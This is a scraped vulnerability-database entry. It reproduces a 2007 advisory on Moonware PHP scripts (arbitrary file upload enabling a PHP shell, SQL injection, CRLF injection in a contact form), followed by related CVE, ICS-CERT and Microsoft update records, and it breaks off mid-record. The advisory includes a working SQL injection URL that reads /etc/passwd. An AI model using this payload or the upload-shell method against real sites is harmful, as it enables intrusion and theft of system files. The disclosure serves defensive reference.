The file /config/upload.php don't have any restriction,
6:$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
8:if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
U can upload a PHP Shell and found it in the subdir /images/
II. Calendar Events
-------- ------
Bug: SQL Injections
Details:
The variable $get is not verified in the file viewevent.php. (We need magic_quotes_gpc = Off)
8:$get = mysql_query("SELECT * FROM cal_events WHERE id = '$id'");
p0c: viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/*
III. Moonware Contact Form
-------- ------- ----
Bug: CRLF Injection
Details:
File contact.php
line 26-35
if($Submit){
$to = $email;
$subject = $_POST["subject"];
$email = $_POST["email"];
$message = $_POST["message"];
$name = $_POST["name"];
$datetime = date("D, d M Y H:i:s");
$finalmessage = "Message from: $name \n Subject: $subject \n Email: $email \n Date Sent: $datetime \n Message:\n\n $message";
44:$sent = mail($to,$subject,$finalmessage);
The vars are not verified and i can insert \r\n...
oops!!
#EOF
{"id": "SECURITYVULNS:DOC:17905", "bulletinFamily": "software", "title": "Moonware Software Multiple Vulnerabilities", "description": "Moonware Software Multiple Vulnerabilities\r\n\r\nby s0cratex\r\n --------\r\nMSN: s0cratex[at]nasa[dot]gov\r\n\r\nMoonware Homepage: http://dalemooney.lost-soldiers.com\r\n\r\n\r\nI. Moon Gallery\r\n ---- -------\r\n\r\nBug: Arbitrary file upload\r\nDork: "Powered by: Dale Mooney Gallery"\r\n\r\nDetails:\r\n\r\nThe file /config/upload.php don't have any restriction,\r\n6:$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); \r\n8:if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {\r\n\r\nU can upload a PHP Shell and found it in the subdir /images/\r\n\r\n\r\nII. Calendar Events\r\n -------- ------\r\n\r\nBug: SQL Injections \r\n\r\nDetails:\r\nThe variable $get is not verified in the file viewevent.php. (We need magic_quotes_gpc = Off)\r\n\r\n8:$get = mysql_query("SELECT * FROM cal_events WHERE id = '$id'");\r\np0c: viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/* \r\n\r\n\r\nIII. Moonware Contact Form\r\n -------- ------- ----\r\n\r\nBug: CRLF Injection\r\n\r\nDetails:\r\n\r\nFile contact.php\r\n\r\nline 26-35\r\nif($Submit){\r\n \r\n $to = $email;\r\n $subject = $_POST["subject"];\r\n $email = $_POST["email"];\r\n $message = $_POST["message"];\r\n $name = $_POST["name"];\r\n $datetime = date("D, d M Y H:i:s");\r\n \r\n $finalmessage = "Message from: $name \n Subject: $subject \n Email: $email \n Date Sent: $datetime \n Message:\n\n $message";\r\n\r\n44:$sent = mail($to,$subject,$finalmessage);\r\nThe vars are not verified and i can insert \r\n...\r\n\r\noops!! \r\n #EOF", "published": "2007-08-28T00:00:00", "modified": "2007-08-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17905", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:23", "edition": 1, "viewCount": 27, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2018-08-31T11:10:23", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4011232", "KB3172464"]}, {"type": "cve", "idList": ["CVE-2014-2595", "CVE-2015-8779", "CVE-2018-17905", "CVE-2017-17905", "CVE-2015-9286", "CVE-2008-7273", "CVE-2008-7272"]}, {"type": "ics", "idList": ["ICSA-18-290-01"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851207"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0510-1"]}, {"type": "nessus", "idList": ["OPENSUSE-2016-233.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135387"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:23", "rev": 2}, "vulnersScore": 7.3}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:38", "description": "When processing project files in Omron CX-Supervisor Versions 3.4.1.0 and prior and tampering with a specific byte, memory corruption may occur within a specific object.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-05T23:29:00", "title": "CVE-2018-17905", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17905"], "modified": "2019-10-09T23:37:00", "cpe": ["cpe:/a:omron:cx-supervisor:3.4.1.0"], "id": "CVE-2018-17905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17905", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:omron:cx-supervisor:3.4.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:40", "description": "PHP Scripts Mall Car Rental Script has CSRF via admin/sitesettings.php.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-27T17:08:00", "title": "CVE-2017-17905", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17905"], "modified": "2018-01-10T19:43:00", "cpe": ["cpe:/a:car_rental_script_project:car_rental_script:2.0.8"], "id": "CVE-2017-17905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-17905", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:car_rental_script_project:car_rental_script:2.0.8:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:09", "description": "Stack-based buffer overflow in the catopen function in the GNU C Library (aka glibc or libc6) before 2.23 allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a long catalog name.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-19T21:59:00", "title": "CVE-2015-8779", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8779"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:gnu:glibc:2.22", "cpe:/o:suse:linux_enterprise_desktop:12", "cpe:/o:suse:suse_linux_enterprise_server:12", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/a:suse:linux_enterprise_debuginfo:11", "cpe:/o:suse:linux_enterprise_software_development_kit:11", "cpe:/o:suse:linux_enterprise_software_development_kit:12", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:suse:linux_enterprise_server:12", "cpe:/o:suse:linux_enterprise_server:11", "cpe:/o:suse:linux_enterprise_desktop:11", "cpe:/o:fedoraproject:fedora:23", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2015-8779", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8779", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:*:vmware:*:*", "cpe:2.3:o:suse:linux_enterprise_server:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:12:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:sp1:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp3:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp2:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp4:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11:sp3:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:23:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:11:sp3:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.22:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp2:*:*:ltss:*:*:*"]}], "zdi": [{"lastseen": "2020-06-22T11:41:34", "bulletinFamily": "info", "cvelist": ["CVE-2018-17905"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-10-17T00:00:00", "id": "ZDI-18-1287", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-1287/", "title": "OMRON CX-Supervisor SCS File Parsing Memory Corruption Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2020-12-18T03:22:04", "bulletinFamily": "info", "cvelist": ["CVE-2018-17913", "CVE-2018-17909", "CVE-2018-17907", "CVE-2018-17905"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.0**\n\n * **Vendor:** Omron\n * **Equipment: **CX-Supervisor\n * **Vulnerabilities:** Improper Restriction of Operations within the Bounds of a Memory Buffer, Out-Of-Bounds Read, Use-After-Free, Incorrect Type Conversion or Cast\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-18-290-01 Omron CX-Supervisor that was published October 17, 2018, on the NCCIC/ICS-CERT website.\n\n## 3\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to execute code under the context of the application, corrupt objects, and force the application to read a value outside of an array.\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of CX-Supervisor are affected:\n\n * CX-Supervisor Versions 3.4.1.0 and prior.\n\n### 4.2 VULNERABILITY OVERVIEW\n\n**4.2.1 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)**\n\nWhen processing project files and tampering with a specific byte, memory corruption may occur within a specific object.\n\n[CVE-2018-17905](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17905>) has been assigned to this vulnerability. A CVSS v3 base score of 4.5 has been calculated; the CVSS vector string is ([AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L>)).\n\n**4.2.2 [OUT-OF-BOUNDS READ CWE-125](<https://cwe.mitre.org/data/definitions/125.html>)**\n\nWhen processing project files and tampering with the value of an offset, an attacker can force the application to read a value outside of an array. \n\n[CVE-2018-17907](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17907>) has been assigned to this vulnerability. A CVSS v3 base score of 2.5 has been calculated; the CVSS vector string is ([AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N>)).\n\n**4.2.3 [USE AFTER FREE CWE-416](<https://cwe.mitre.org/data/definitions/416.html>)**\n\nWhen processing project files the application fails to check if it is referencing freed memory, which may allow an attacker to execute code in under the context of the application. \n\n[CVE-2018-17909](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17909>) has been assigned to this vulnerability. A CVSS v3 base score of 4.5 has been calculated; the CVSS vector string is ([AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L>)).\n\n**4.2.4 [INCORRECT TYPE VERSION OR CAST CWE-704](<https://cwe.mitre.org/data/definitions/704.html>)**\n\nA type confusion vulnerability exists when processing project files, which may allow an attacker to execute code in the context of the application. \n\n[CVE-2018-17913](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17913>) has been assigned to this vulnerability. A CVSS v3 base score of 7.0 has been calculated; the CVSS vector string is ([AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H>)).\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTOR:** Energy\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Japan\n\n### 4.4 RESEARCHER\n\n**\\--------- Begin Update A Part 1 of 1 --------**\n\nMat Powell of Trend Micro\u2019s Zero Day Initiative, Esteban Ruiz (mr_me) of Source Incite, Ariele Caltabiano (kimiya) of 9SG Security Team, and b0nd @garage4hackers working with Trend Micro\u2019s Zero Day Initiative reported these vulnerabilities to NCCIC.\n\n**\\--------- End Update A Part 1 of 1 ----------**\n\n## 5\\. MITIGATIONS\n\nOmron has released Version 3.4.2 of CX-Supervisor to address the reported vulnerabilities. Users can download the latest version of CX-Supervisor at the following location:\n\n[https://www.myomron.com/index.php?action=kb&article=1709](<https://www.myomron.com/index.php?action=kb&article=1709>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities. These vulnerabilities are not exploitable remotely. High skill level is needed to exploit.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-290-01>); we'd welcome your feedback.\n", "edition": 15, "modified": "2019-01-31T00:00:00", "published": "2018-10-17T00:00:00", "id": "ICSA-18-290-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-290-01", "title": "Omron CX-Supervisor (Update A)", "type": "ics", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2021-01-01T22:52:55", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-11826"], "description": "<html><body><p>Resolves a remote code execution vulnerability in Microsoft Office. </p><h2>Summary</h2><p>This security update resolves a vulnerability in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about the vulnerability, see <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826\" target=\"\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11826</a>.</p><p><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/2817430\">Service Pack 1 for Microsoft Office 2013</a> installed on the computer.</p><section applies-to-products=\"[]\" ng-attr-id=\"{{contentSection.meta.id}}\" ng-class=\"{'internal-content': isInternalSection() }\" ng-if=\"typeof(contentSection) !== 'string'\"><p>Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2013. It doesn't apply to the Office 2013 Click-to-Run editions, such as Microsoft Office 365 Home. (See\u00a0<a aria-live=\"rude\" bookmark-id=\"officeinstall\" data-content-id=\"\" data-content-type=\"\" href=\"https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/\" managed-link=\"\" tabindex=\"0\" target=\"\">Determining your Office version</a>.)</p></section><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011232\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=9259f352-8b97-4334-84cf-37580b034c08\" managed-link=\"\" target=\"\">Download the security update KB4011232 for the 32-bit version of Word 2013</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=968b3810-ed63-4e2f-b70f-d094dfa00b62\" managed-link=\"\" target=\"\">Download the security update KB4011232 for the 64-bit version of Word 2013</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20171010\">security update deployment information: October 10, 2017</a>.</p><h3>Security update replacement information</h3><p>This security update replaces previously released security update <a href=\"https://support.microsoft.com/help/3203393\"> KB 3203393</a>.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package Name</th><th>Package Hash SHA 1</th><th>Package Hash SHA 